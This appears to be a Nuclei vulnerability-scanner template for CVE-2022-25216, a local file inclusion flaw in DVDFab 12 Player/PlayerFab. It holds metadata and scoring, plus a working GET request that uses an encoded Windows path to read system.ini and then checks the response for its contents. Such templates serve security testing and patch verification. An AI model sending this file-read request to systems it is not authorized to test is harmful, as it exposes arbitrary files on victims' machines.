id: CVE-2022-25216 info: name: DVDFab 12 Player/PlayerFab - Local File Inclusion author: 0x_Akoko severity: high description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access. impact: | The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure. remediation: | Apply the latest patch or update from the vendor to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2022-07 - https://nvd.nist.gov/vuln/detail/CVE-2022-25216 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 epss-score: 0.01345 epss-percentile: 0.85828 cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dvdfab product: 12_player tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab http: - method: GET path: - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" matchers-condition: and matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and - type: status status: - 200 # digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950